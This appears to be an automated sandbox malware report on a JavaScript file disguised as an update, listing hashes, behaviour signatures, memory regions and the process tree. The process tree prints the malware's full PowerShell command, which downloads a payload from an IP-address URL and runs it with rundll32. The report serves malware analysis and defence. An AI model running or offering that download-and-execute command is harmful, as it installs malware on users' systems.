Resubmissions

15-08-2024 20:42

240815-zhg3jaxglr 10

14-06-2024 12:05

240614-n89dxszekb 10

28-05-2024 22:27

240528-2dhvdagb62 10

Analysis

  • max time kernel
    130s
  • max time network
    137s
  • platform
    windows10-1703_x64
  • resource
    win10-20240611-es
  • resource tags

    arch:x64arch:x86image:win10-20240611-eslocale:es-esos:windows10-1703-x64systemwindows
  • submitted
    15-08-2024 20:42

General

  • Target

    Update_25_04_2024_3146918.js

  • Size

    135KB

  • MD5

    bf7f711e823916e5f56ff4d2286ee866

  • SHA1

    d9c9d093ce5f1cbc78280ab0232b5d6ef8c25729

  • SHA256

    0c9697506df18baac4b4215e78a43926ea4bb94ea3607c851a1c2fe3b5b31f17

  • SHA512

    842616018719df7c6ee7cac5996ea1399a2a459353ee96de2bf9fda122aac861baa0a5c848dad1d4aa756fab897d1e7a978eac359458d52801020685db67d941

  • SSDEEP

    1536:XDOApMn1gDmN2yBCn/yA3seAeLCMamLcInL1VXJ3Duvnr:6A+n1gDmNnw/yA3slMamLcInL7tDuvr

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.49.69.41/data/d291855f9fd1c934f7c97a4d2ba99b89

Signatures

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\Update_25_04_2024_3146918.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2120
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -c "start-job { param($a) Import-Module BitsTransfer; $d = $env:temp + '\' + [System.IO.Path]::GetRandomFileName(); Start-BitsTransfer -Source 'http://185.49.69.41/data/d291855f9fd1c934f7c97a4d2ba99b89' -Destination $d; if (![System.IO.File]::Exists($d)) {exit}; $p = $d + ',Start'; rundll32.exe $p; Start-Sleep -Seconds 10} -Argument 0 | wait-job | Receive-Job"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2412
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3516

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yvbd0mrt.own.ps1

    Filesize

    1B

    MD5

    c4ca4238a0b923820dcc509a6f75849b

    SHA1

    356a192b7913b04c54574d18c28d46e6395428ab

    SHA256

    6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

    SHA512

    4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

  • memory/2412-29-0x00007FFFA9370000-0x00007FFFA9D5C000-memory.dmp

    Filesize

    9.9MB

  • memory/2412-175-0x00007FFFA9370000-0x00007FFFA9D5C000-memory.dmp

    Filesize

    9.9MB

  • memory/2412-8-0x000001EC2F350000-0x000001EC2F372000-memory.dmp

    Filesize

    136KB

  • memory/2412-7-0x00007FFFA9370000-0x00007FFFA9D5C000-memory.dmp

    Filesize

    9.9MB

  • memory/2412-9-0x00007FFFA9370000-0x00007FFFA9D5C000-memory.dmp

    Filesize

    9.9MB

  • memory/2412-10-0x000001EC2F650000-0x000001EC2F752000-memory.dmp

    Filesize

    1.0MB

  • memory/2412-13-0x000001EC2F7E0000-0x000001EC2F856000-memory.dmp

    Filesize

    472KB

  • memory/2412-30-0x000001EC301D0000-0x000001EC303D8000-memory.dmp

    Filesize

    2.0MB

  • memory/2412-202-0x00007FFFA9370000-0x00007FFFA9D5C000-memory.dmp

    Filesize

    9.9MB

  • memory/2412-6-0x000001EC171C0000-0x000001EC171D0000-memory.dmp

    Filesize

    64KB

  • memory/2412-5-0x000001EC2F3B0000-0x000001EC2F432000-memory.dmp

    Filesize

    520KB

  • memory/2412-35-0x000001EC2F7C0000-0x000001EC2F7D4000-memory.dmp

    Filesize

    80KB

  • memory/2412-28-0x000001EC2FE40000-0x000001EC2FFB6000-memory.dmp

    Filesize

    1.5MB

  • memory/2412-195-0x000001EC2F9B0000-0x000001EC2F9F0000-memory.dmp

    Filesize

    256KB

  • memory/2412-172-0x00007FFFA9373000-0x00007FFFA9374000-memory.dmp

    Filesize

    4KB

  • memory/2412-173-0x00007FFFA9370000-0x00007FFFA9D5C000-memory.dmp

    Filesize

    9.9MB

  • memory/2412-4-0x00007FFFA9373000-0x00007FFFA9374000-memory.dmp

    Filesize

    4KB

  • memory/3516-174-0x0000024C7E130000-0x0000024C7E138000-memory.dmp

    Filesize

    32KB

  • memory/3516-165-0x0000024C7E640000-0x0000024C7E652000-memory.dmp

    Filesize

    72KB

  • memory/3516-126-0x0000024C7E610000-0x0000024C7E632000-memory.dmp

    Filesize

    136KB